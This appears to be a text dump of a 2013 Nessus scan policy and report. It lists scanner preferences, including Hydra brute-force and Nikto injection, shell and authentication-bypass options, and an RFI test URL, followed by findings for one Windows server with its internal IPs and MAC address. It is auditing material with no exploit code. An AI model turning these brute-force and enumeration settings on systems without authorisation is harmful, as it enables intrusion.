+35703 +SMB Registry : Start the Registry Service during the scan[checkbox]:Start the registry service during the scan +Start the registry service during the scan +checkbox +no +no + +SMB Registry : Start the Registry Service during the scan +35703 +SMB Registry : Start the Registry Service during the scan[checkbox]:Enable administrative shares during the scan +Enable administrative shares during the scan +checkbox +no +no + +Hydra: SMB +15884 +Hydra: SMB[radio]:Check local / domain accounts +Check local / domain accounts +radio +Local accounts; Domain Accounts; Either +Local accounts; Domain Accounts; Either + +Hydra: SMB +15884 +Hydra: SMB[checkbox]:Interpret passwords as NTLM hashes +Interpret passwords as NTLM hashes +checkbox +no +no + +Patch Management: SCCM Server Settings +57029 +Patch Management: SCCM Server Settings[entry]:SCCM Server : +SCCM Server : +entry + + + +Patch Management: SCCM Server Settings +57029 +Patch Management: SCCM Server Settings[entry]:SCCM Domain : +SCCM Domain : +entry + + + +Patch Management: SCCM Server Settings +57029 +Patch Management: SCCM Server Settings[entry]:SCCM Username : +SCCM Username : +entry + + + +Patch Management: SCCM Server Settings +57029 +Patch Management: SCCM Server Settings[password]:SCCM Password : +SCCM Password : +password + + + +Palo Alto Networks PAN-OS Settings +64286 +Palo Alto Networks PAN-OS Settings[entry]:Palo Alto Username : +Palo Alto Username : +entry + + + +Palo Alto Networks PAN-OS Settings +64286 +Palo Alto Networks PAN-OS Settings[password]:Palo Alto Password : +Palo Alto Password : +password + + + +Palo Alto Networks PAN-OS Settings +64286 +Palo Alto Networks PAN-OS Settings[entry]:Palo Alto Port : +Palo Alto Port : +entry +443 +443 + +Palo Alto Networks PAN-OS Settings +64286 +Palo Alto Networks PAN-OS Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +Port scanners settings +33812 +Port scanners settings[checkbox]:Check open TCP ports found by local port enumerators +Check open TCP ports found by local port enumerators +checkbox +no +no + +Port scanners settings +33812 +Port scanners settings[checkbox]:Only run network port scanners if local port enumeration failed +Only run network port scanners if local port enumeration failed +checkbox +yes +yes + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[entry]:VMware vCenter host : +VMware vCenter host : +entry + + + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[entry]:VMware vCenter port : +VMware vCenter port : +entry +443 +443 + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[entry]:VMware vCenter user name : +VMware vCenter user name : +entry + + + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[password]:VMware vCenter password : +VMware vCenter password : +password + + + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[checkbox]:SSL : +SSL : +checkbox +yes +yes + +VMware vCenter SOAP API Settings +63060 +VMware vCenter SOAP API Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Host : +Host : +entry +services.shavlik.com +services.shavlik.com + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Port : +Port : +entry +443 +443 + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Username : +Username : +entry + + + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[password]:Password : +Password : +password + + + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Domain : +Domain : +entry + + + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:API path : +API path : +entry +/api/authenticationbroker/account/httpIssue.svc/ +/api/authenticationbroker/account/httpIssue.svc/ + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Authentication realm : +Authentication realm : +entry +https://services.shavlik.com/api/dataservices/v1r1/default.aspx +https://services.shavlik.com/api/dataservices/v1r1/default.aspx + +Patch Management: VMware Go Server Settings +57026 +Patch Management: VMware Go Server Settings[entry]:Service path : +Service path : +entry +/api/dataservices/v1r1/OData.svc/ +/api/dataservices/v1r1/OData.svc/ + +HTTP cookies import +42893 +HTTP cookies import[file]:Cookies file : +Cookies file : +file + + + +Ping the remote host +10180 +Ping the remote host[entry]:TCP ping destination port(s) : +TCP ping destination port(s) : +entry +built-in +built-in + +Ping the remote host +10180 +Ping the remote host[checkbox]:Do an ARP ping +Do an ARP ping +checkbox +yes +yes + +Ping the remote host +10180 +Ping the remote host[checkbox]:Do a TCP ping +Do a TCP ping +checkbox +yes +yes + +Ping the remote host +10180 +Ping the remote host[checkbox]:Do an ICMP ping +Do an ICMP ping +checkbox +yes +yes + +Ping the remote host +10180 +Ping the remote host[entry]:Number of retries (ICMP) : +Number of retries (ICMP) : +entry +2 +2 + +Ping the remote host +10180 +Ping the remote host[checkbox]:Do an applicative UDP ping (DNS,RPC...) +Do an applicative UDP ping (DNS,RPC...) +checkbox +no +no + +Ping the remote host +10180 +Ping the remote host[checkbox]:Make the dead hosts appear in the report +Make the dead hosts appear in the report +checkbox +no +no + +Ping the remote host +10180 +Ping the remote host[checkbox]:Log live hosts in the report +Log live hosts in the report +checkbox +no +no + +Ping the remote host +10180 +Ping the remote host[checkbox]:Test the local Nessus host +Test the local Nessus host +checkbox +yes +yes + +Ping the remote host +10180 +Ping the remote host[checkbox]:Fast network discovery +Fast network discovery +checkbox +no +no + +LDAP 'Domain Admins' Group Membership Enumeration +58038 +LDAP 'Domain Admins' Group Membership Enumeration[entry]:LDAP user : +LDAP user : +entry + + + +LDAP 'Domain Admins' Group Membership Enumeration +58038 +LDAP 'Domain Admins' Group Membership Enumeration[password]:LDAP password : +LDAP password : +password + + + +LDAP 'Domain Admins' Group Membership Enumeration +58038 +LDAP 'Domain Admins' Group Membership Enumeration[entry]:Max results : +Max results : +entry +1000 +1000 + +Global variable settings +12288 +Global variable settings[checkbox]:Probe services on every port +Probe services on every port +checkbox +yes +yes + +Global variable settings +12288 +Global variable settings[checkbox]:Do not log in with user accounts not specified in the policy +Do not log in with user accounts not specified in the policy +checkbox +no +no + +Global variable settings +12288 +Global variable settings[checkbox]:Enable CGI scanning +Enable CGI scanning +checkbox +no +no + +Global variable settings +12288 +Global variable settings[radio]:Network type +Network type +radio +Mixed (use RFC 1918);Private LAN;Public WAN (Internet) +Mixed (use RFC 1918);Private LAN;Public WAN (Internet) + +Global variable settings +12288 +Global variable settings[checkbox]:Enable experimental scripts +Enable experimental scripts +checkbox +no +no + +Global variable settings +12288 +Global variable settings[checkbox]:Thorough tests (slow) +Thorough tests (slow) +checkbox +no +no + +Global variable settings +12288 +Global variable settings[radio]:Report verbosity +Report verbosity +radio +Normal;Quiet;Verbose +Normal;Quiet;Verbose + +Global variable settings +12288 +Global variable settings[radio]:Report paranoia +Report paranoia +radio +Normal;Avoid false alarms;Paranoid (more false alarms) +Normal;Avoid false alarms;Paranoid (more false alarms) + +Global variable settings +12288 +Global variable settings[entry]:HTTP User-Agent +HTTP User-Agent +entry +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) + +Global variable settings +12288 +Global variable settings[file]:SSL certificate to use : +SSL certificate to use : +file + + + +Global variable settings +12288 +Global variable settings[file]:SSL CA to trust : +SSL CA to trust : +file + + + +Global variable settings +12288 +Global variable settings[file]:SSL key to use : +SSL key to use : +file + + + +Global variable settings +12288 +Global variable settings[password]:SSL password for SSL key : +SSL password for SSL key : +password + + + +Hydra: SAP R3 +15883 +Hydra: SAP R3[entry]:Client ID (between 0 and 99) : +Client ID (between 0 and 99) : +entry + + + +Cleartext protocols settings +21744 +Cleartext protocols settings[entry]:User name : +User name : +entry + + + +Cleartext protocols settings +21744 +Cleartext protocols settings[password]:Password (unsafe!) : +Password (unsafe!) : +password + + + +Cleartext protocols settings +21744 +Cleartext protocols settings[checkbox]:Try to perform patch level checks over telnet +Try to perform patch level checks over telnet +checkbox +no +no + +Cleartext protocols settings +21744 +Cleartext protocols settings[checkbox]:Try to perform patch level checks over rsh +Try to perform patch level checks over rsh +checkbox +no +no + +Cleartext protocols settings +21744 +Cleartext protocols settings[checkbox]:Try to perform patch level checks over rexec +Try to perform patch level checks over rexec +checkbox +no +no + +IBM iSeries Credentials +57861 +IBM iSeries Credentials[entry]:Login : +Login : +entry + + + +IBM iSeries Credentials +57861 +IBM iSeries Credentials[password]:Password : +Password : +password + + + +SMB Use Domain SID to Enumerate Users +10399 +SMB Use Domain SID to Enumerate Users[entry]:Start UID : +Start UID : +entry +1000 +1000 + +SMB Use Domain SID to Enumerate Users +10399 +SMB Use Domain SID to Enumerate Users[entry]:End UID : +End UID : +entry +1200 +1200 + +Do not scan fragile devices +22481 +Do not scan fragile devices[checkbox]:Scan Network Printers +Scan Network Printers +checkbox +no +no + +Do not scan fragile devices +22481 +Do not scan fragile devices[checkbox]:Scan Novell Netware hosts +Scan Novell Netware hosts +checkbox +no +no + +Hydra: HTTP proxy +15874 +Hydra: HTTP proxy[entry]:Web site (optional) : +Web site (optional) : +entry + + + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Enable Nikto +Enable Nikto +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Disable if server never replies 404 +Disable if server never replies 404 +checkbox +yes +yes + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[entry]:Root directory +Root directory +entry + + + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[entry]:Pause between tests (s) +Pause between tests (s) +entry + + + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[radio]:Scan CGI directories +Scan CGI directories +radio +User supplied;All;None +User supplied;All;None + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Display: 1 Show redirects +Display: 1 Show redirects +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Display: 2 Show cookies received +Display: 2 Show cookies received +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Display: 3 Show all 200/OK responses +Display: 3 Show all 200/OK responses +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Display: 4 Show URLs which require authentication +Display: 4 Show URLs which require authentication +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Display: V Verbose Output +Display: V Verbose Output +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 1 Interesting File / Seen in logs +Tuning: 1 Interesting File / Seen in logs +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 2 Misconfiguration / Default File +Tuning: 2 Misconfiguration / Default File +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 3 Information Disclosure +Tuning: 3 Information Disclosure +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 4 Injection (XSS/Script/HTML) +Tuning: 4 Injection (XSS/Script/HTML) +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 5 Remote File Retrieval - Inside Web Root +Tuning: 5 Remote File Retrieval - Inside Web Root +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 6 Denial of Service +Tuning: 6 Denial of Service +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 7 Remote File Retrieval - Server Wide +Tuning: 7 Remote File Retrieval - Server Wide +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 8 Command Execution / Remote Shell +Tuning: 8 Command Execution / Remote Shell +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 9 SQL Injection +Tuning: 9 SQL Injection +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: 0 File Upload +Tuning: 0 File Upload +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: a Authentication Bypass +Tuning: a Authentication Bypass +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: b Software Identification +Tuning: b Software Identification +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: c Remote Source Inclusion +Tuning: c Remote Source Inclusion +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Tuning: x Reverse Tuning Options (i.e., include all except specified) +Tuning: x Reverse Tuning Options (i.e., include all except specified) +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Mutate: 1 Test all files with all root directories +Mutate: 1 Test all files with all root directories +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Mutate: 2 Guess for password file names +Mutate: 2 Guess for password file names +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Mutate: 3 Enumerate user names via Apache (/~user type requests) +Mutate: 3 Enumerate user names via Apache (/~user type requests) +checkbox +no +no + +Nikto (NASL wrapper) +14260 +Nikto (NASL wrapper)[checkbox]:Mutate: 4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests) +Mutate: 4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests) +checkbox +no +no + +Oracle Settings +22076 +Oracle Settings[entry]:Oracle SID : +Oracle SID : +entry + + + +Oracle Settings +22076 +Oracle Settings[checkbox]:Test default accounts (slow) +Test default accounts (slow) +checkbox +no +no + +Web Application Tests Settings +39471 +Web Application Tests Settings[checkbox]:Enable web applications tests +Enable web applications tests +checkbox +no +no + +Web Application Tests Settings +39471 +Web Application Tests Settings[entry]:Maximum run time (min) : +Maximum run time (min) : +entry +60 +60 + +Web Application Tests Settings +39471 +Web Application Tests Settings[checkbox]:Try all HTTP methods +Try all HTTP methods +checkbox +no +no + +Web Application Tests Settings +39471 +Web Application Tests Settings[radio]:Combinations of arguments values +Combinations of arguments values +radio +one value;some pairs;all pairs (slower but efficient);some combinations;all combinations (extremely slow) +one value;some pairs;all pairs (slower but efficient);some combinations;all combinations (extremely slow) + +Web Application Tests Settings +39471 +Web Application Tests Settings[checkbox]:HTTP Parameter Pollution +HTTP Parameter Pollution +checkbox +no +no + +Web Application Tests Settings +39471 +Web Application Tests Settings[radio]:Stop at first flaw +Stop at first flaw +radio +per CGI;per port (quicker);per parameter (slow);look for all flaws (slower) +per CGI;per port (quicker);per parameter (slow);look for all flaws (slower) + +Web Application Tests Settings +39471 +Web Application Tests Settings[checkbox]:Test embedded web servers +Test embedded web servers +checkbox +no +no + +Web Application Tests Settings +39471 +Web Application Tests Settings[entry]:URL for Remote File Inclusion : +URL for Remote File Inclusion : +entry +http://rfi.nessus.org/rfi.txt +http://rfi.nessus.org/rfi.txt + +Nessus TCP scanner +10335 +Nessus TCP scanner[radio]:Firewall detection : +Firewall detection : +radio +Automatic (normal);Disabled (softer);Do not detect RST rate limitation (soft);Ignore closed ports (aggressive) +Automatic (normal);Disabled (softer);Do not detect RST rate limitation (soft);Ignore closed ports (aggressive) + +HTTP login page +11149 +HTTP login page[entry]:Login page : +Login page : +entry +/ +/ + +HTTP login page +11149 +HTTP login page[entry]:Login form : +Login form : +entry + + + +HTTP login page +11149 +HTTP login page[entry]:Login form fields : +Login form fields : +entry +user=%USER%&pass=%PASS% +user=%USER%&pass=%PASS% + +HTTP login page +11149 +HTTP login page[radio]:Login form method : +Login form method : +radio +POST;GET +POST;GET + +HTTP login page +11149 +HTTP login page[checkbox]:Automated login page search +Automated login page search +checkbox +no +no + +HTTP login page +11149 +HTTP login page[entry]:Re-authenticate delay (seconds) : +Re-authenticate delay (seconds) : +entry + + + +HTTP login page +11149 +HTTP login page[entry]:Check authentication on page : +Check authentication on page : +entry + + + +HTTP login page +11149 +HTTP login page[entry]:Follow 30x redirections (# of levels) : +Follow 30x redirections (# of levels) : +entry +2 +2 + +HTTP login page +11149 +HTTP login page[entry]:Authenticated regex : +Authenticated regex : +entry + + + +HTTP login page +11149 +HTTP login page[checkbox]:Invert test (disconnected if regex matches) +Invert test (disconnected if regex matches) +checkbox +no +no + +HTTP login page +11149 +HTTP login page[checkbox]:Match regex on HTTP headers +Match regex on HTTP headers +checkbox +no +no + +HTTP login page +11149 +HTTP login page[checkbox]:Case insensitive regex +Case insensitive regex +checkbox +no +no + +HTTP login page +11149 +HTTP login page[checkbox]:Abort web application tests if login fails +Abort web application tests if login fails +checkbox +no +no + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Server : +Web Reports Server : +entry + + + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Port : +Web Reports Port : +entry + + + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Username : +Web Reports Username : +entry + + + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[password]:Web Reports Password : +Web Reports Password : +password + + + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[checkbox]:SSL : +SSL : +checkbox +no +no + +Patch Management: IBM Tivoli Endpoint Manager Server Settings +62558 +Patch Management: IBM Tivoli Endpoint Manager Server Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[checkbox]:Always enable Hydra (slow) +Always enable Hydra (slow) +checkbox +no +no + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[file]:Logins file : +Logins file : +file + + + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[file]:Passwords file : +Passwords file : +file + + + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[entry]:Number of parallel tasks : +Number of parallel tasks : +entry +16 +16 + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[entry]:Timeout (in seconds) : +Timeout (in seconds) : +entry +30 +30 + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[checkbox]:Try empty passwords +Try empty passwords +checkbox +yes +yes + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[checkbox]:Try login as password +Try login as password +checkbox +yes +yes + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[checkbox]:Exit as soon as an account is found +Exit as soon as an account is found +checkbox +no +no + +Hydra (NASL wrappers options) +15868 +Hydra (NASL wrappers options)[checkbox]:Add accounts found by other plugins to login file +Add accounts found by other plugins to login file +checkbox +yes +yes + +Patch Report +66334 +Patch Report[checkbox]:Display the superseded patches in the report +Display the superseded patches in the report +checkbox +yes +yes + +Wake-on-LAN +52616 +Wake-on-LAN[file]:List of MAC addresses for Wake-on-LAN: +List of MAC addresses for Wake-on-LAN: +file + + + +Wake-on-LAN +52616 +Wake-on-LAN[entry]:Time to wait (in minutes) for the systems to boot: +Time to wait (in minutes) for the systems to boot: +entry +5 +5 + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Controller : +Domain Controller : +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain : +Domain : +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Username : +Domain Username : +entry + + + +ADSI Settings +60024 +ADSI Settings[password]:Domain Password : +Domain Password : +password + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Controller 2: +Domain Controller 2: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain 2: +Domain 2: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Username 2: +Domain Username 2: +entry + + + +ADSI Settings +60024 +ADSI Settings[password]:Domain Password 2: +Domain Password 2: +password + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Controller 3: +Domain Controller 3: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain 3: +Domain 3: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Username 3: +Domain Username 3: +entry + + + +ADSI Settings +60024 +ADSI Settings[password]:Domain Password 3: +Domain Password 3: +password + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Controller 4: +Domain Controller 4: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain 4: +Domain 4: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Username 4: +Domain Username 4: +entry + + + +ADSI Settings +60024 +ADSI Settings[password]:Domain Password 4: +Domain Password 4: +password + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Controller 5: +Domain Controller 5: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain 5: +Domain 5: +entry + + + +ADSI Settings +60024 +ADSI Settings[entry]:Domain Username 5: +Domain Username 5: +entry + + + +ADSI Settings +60024 +ADSI Settings[password]:Domain Password 5: +Domain Password 5: +password + + + +Hydra: PostgreSQL +18660 +Hydra: PostgreSQL[entry]:Database name (optional) : +Database name (optional) : +entry + + + +Hydra: Cisco enable +15870 +Hydra: Cisco enable[entry]:Logon password : +Logon password : +entry + + + +Database settings +33815 +Database settings[entry]:Login : +Login : +entry + + + +Database settings +33815 +Database settings[password]:Password : +Password : +password + + + +Database settings +33815 +Database settings[radio]:DB Type : +DB Type : +radio +Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL +Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL + +Database settings +33815 +Database settings[entry]:Database SID : +Database SID : +entry + + + +Database settings +33815 +Database settings[entry]:Database port to use : +Database port to use : +entry + + + +Database settings +33815 +Database settings[radio]:Oracle auth type: +Oracle auth type: +radio +NORMAL;SYSOPER;SYSDBA +NORMAL;SYSOPER;SYSDBA + +Database settings +33815 +Database settings[radio]:SQL Server auth type: +SQL Server auth type: +radio +Windows;SQL +Windows;SQL + +Service Detection +22964 +Service Detection[radio]:Test SSL based services +Test SSL based services +radio +Known SSL ports;All;None +Known SSL ports;All;None + +Kerberos configuration +17351 +Kerberos configuration[entry]:Kerberos Key Distribution Center (KDC) : +Kerberos Key Distribution Center (KDC) : +entry + + + +Kerberos configuration +17351 +Kerberos configuration[entry]:Kerberos KDC Port : +Kerberos KDC Port : +entry +88 +88 + +Kerberos configuration +17351 +Kerberos configuration[radio]:Kerberos KDC Transport : +Kerberos KDC Transport : +radio +udp;tcp +udp;tcp + +Kerberos configuration +17351 +Kerberos configuration[entry]:Kerberos Realm (SSH only) : +Kerberos Realm (SSH only) : +entry + + + +Malicious Process Detection +59275 +Malicious Process Detection[file]:Additional MD5 hashes (optional) : +Additional MD5 hashes (optional) : +file + + + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[entry]:WSUS Server : +WSUS Server : +entry + + + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[entry]:WSUS Port : +WSUS Port : +entry + + + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[entry]:WSUS Username : +WSUS Username : +entry + + + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[password]:WSUS Password : +WSUS Password : +password + + + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[checkbox]:SSL : +SSL : +checkbox +no +no + +Patch Management: WSUS Server Settings +57031 +Patch Management: WSUS Server Settings[checkbox]:Verify SSL Certificate : +Verify SSL Certificate : +checkbox +no +no + +Nessus SYN scanner +11219 +Nessus SYN scanner[radio]:Firewall detection : +Firewall detection : +radio +Automatic (normal);Disabled (softer);Do not detect RST rate limitation (soft);Ignore closed ports (aggressive) +Automatic (normal);Disabled (softer);Do not detect RST rate limitation (soft);Ignore closed ports (aggressive) + +SMTP settings +11038 +SMTP settings[entry]:Third party domain : +Third party domain : +entry +example.com +example.com + +SMTP settings +11038 +SMTP settings[entry]:From address : +From address : +entry +nobody@example.com +nobody@example.com + +SMTP settings +11038 +SMTP settings[entry]:To address : +To address : +entry +postmaster@[AUTO_REPLACED_IP] +postmaster@[AUTO_REPLACED_IP] + +SMB Use Host SID to Enumerate Local Users +10860 +SMB Use Host SID to Enumerate Local Users[entry]:Start UID : +Start UID : +entry +1000 +1000 + +SMB Use Host SID to Enumerate Local Users +10860 +SMB Use Host SID to Enumerate Local Users[entry]:End UID : +End UID : +entry +1200 +1200 + +Web mirroring +10662 +Web mirroring[entry]:Number of pages to mirror : +Number of pages to mirror : +entry +1000 +1000 + +Web mirroring +10662 +Web mirroring[entry]:Maximum depth : +Maximum depth : +entry +6 +6 + +Web mirroring +10662 +Web mirroring[entry]:Start page : +Start page : +entry +/ +/ + +Web mirroring +10662 +Web mirroring[entry]:Excluded items regex : +Excluded items regex : +entry +/server_privileges\.php|logout +/server_privileges\.php|logout + +Web mirroring +10662 +Web mirroring[checkbox]:Follow dynamic pages : +Follow dynamic pages : +checkbox +no +no + + + +MacOS X Local Security Checks +enabled + +DNS +enabled + +Gain a shell remotely +enabled + +Solaris Local Security Checks +enabled + +Port scanners +mixed + +Web Servers +enabled + +SMTP problems +enabled + +Service detection +enabled + +CGI abuses : XSS +enabled + +Debian Local Security Checks +enabled + +Databases +enabled + +Mandriva Local Security Checks +enabled + +Default Unix Accounts +enabled + +Denial of Service +enabled + +Settings +enabled + +Backdoors +enabled + +HP-UX Local Security Checks +enabled + +VMware ESX Local Security Checks +enabled + +SCADA +enabled + +General +enabled + +Red Hat Local Security Checks +enabled + +FreeBSD Local Security Checks +enabled + +CGI abuses +enabled + +Netware +enabled + +Windows : User management +enabled + +Peer-To-Peer File Sharing +enabled + +Slackware Local Security Checks +enabled + +SNMP +enabled + +Gentoo Local Security Checks +enabled + +Fedora Local Security Checks +enabled + +Misc. +enabled + +Ubuntu Local Security Checks +enabled + +FTP +enabled + +Firewalls +enabled + +Windows : Microsoft Bulletins +enabled + +SuSE Local Security Checks +enabled + +Policy Compliance +enabled + +Windows +enabled + +RPC +enabled + +Finger abuses +enabled + +CentOS Local Security Checks +enabled + +AIX Local Security Checks +enabled + +CISCO +enabled + +Junos Local Security Checks +enabled + +Mobile Devices +enabled + +Scientific Linux Local Security Checks +enabled + +Brute force attacks +enabled + + +34220 +Netstat Portscanner (WMI) +Port scanners +enabled + +14274 +Nessus SNMP Scanner +Port scanners +enabled + +14272 +netstat portscanner (SSH) +Port scanners +enabled + +10180 +Ping the remote host +Port scanners +enabled + +11219 +Nessus SYN scanner +Port scanners +enabled + + + + + +Mon Jul 1 11:40:48 2013 +1 +general-purpose +Microsoft Windows Server 2008 R2 Standard Service Pack 1 +00:50:56:81:01:e3 +10.31.112.29 +172.16.138.2 +10.31.112.29 +qa3app09 +QA3APP09 +Mon Jul 1 11:33:11 2013 + + +This script displays, for each tested host, information about the scan itself : + + - The version of the plugin set + - The type of plugin feed (HomeFeed or ProfessionalFeed) + - The version of the Nessus Engine + - The port scanner(s) used + - The port range scanned + - Whether credentialed or third-party patch management checks are possible + - The date of the scan + - The duration of the scan + - The number of hosts scanned in parallel + - The number of checks done in parallel +scan_info.nasl +2013/05/31 +Nessus Scan Information +2005/08/26 +summary +None +$Revision: 1.59 $ +n/a +Information about the Nessus scan. +Information about this scan : + +Nessus version : 5.2.1 +Plugin feed version : 201306260615 +Type of plugin feed : HomeFeed (Non-commercial use only) +Scanner IP : 172.16.138.174 +Port scanner(s) : nessus_syn_scanner +Port range : default +Thorough tests : no +Experimental tests : no +Paranoia level : 1 +Report Verbosity : 1 +Safe checks : yes +Optimize the test : yes +Credentialed checks : no +Patch management checks : None +CGI scanning : disabled +Web application tests : disabled +Max hosts : 80 +Max checks : 5 +Recv timeout : 5 +Backports : None +Allow post-scan editing: Yes +Scan Start Date : 2013/7/1 11:33 +Scan duration : 453 sec + + + +One of several ports that were previously open are now closed or unresponsive. + +There are several possible reasons for this : + + - The scan may have caused a service to freeze or stop running. + + - An administrator may have stopped a particular service during the scanning process. + +This might be an availability problem related to the following : + + - A network outage has been experienced during the scan, and the remote network cannot be reached anymore by the scanner. + + - This scanner may has been blacklisted by the system administrator or by an automatic intrusion detection / prevention system that detected the scan. + + - The remote host is now down, either because a user turned it off during the scan or because a select denial of service was effective. + +In any case, the audit of the remote host might be incomplete and may need to be done again +check_ports.nasl +2013/05/14 +Open Port Re-check +2002/03/19 +remote +None +$Revision: 1.41 $ +- Increase checks_read_timeout and/or reduce max_checks + +- Disable any IPS during the Nessus scan +Previously open ports are now closed. +Port 135 was detected as being open but is now unresponsive +Port 3389 was detected as being open but is now unresponsive +Port 80 was detected as being open but is now unresponsive + + + +cpe:/o:microsoft:windows +cpe:/a:microsoft:remote_desktop_protocol +4.3 +CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N +The remote Terminal Services is not configured to use Network Level Authentication (NLA). NLA uses the Credential Security Support Provider (CredSSP) protocol to perform strong server authentication either through TLS/SSL or Kerberos mechanisms, which protect against man-in-the-middle attacks. In addition to improving authentication, NLA also helps protect the remote computer from malicious users and software by completing user authentication before a full RDP connection is established. +rdp_credssp_detect.nbin +2013/04/22 +Terminal Services Doesn't Use Network Level Authentication (NLA) +2012/03/23 +remote +Medium +$Revision: 1.9 $ +http://technet.microsoft.com/en-us/library/cc732713.aspx +http://www.nessus.org/u?e2628096 +Enable Network Level Authentication (NLA) on the remote RDP server. This is generally done on the 'Remote' tab of the 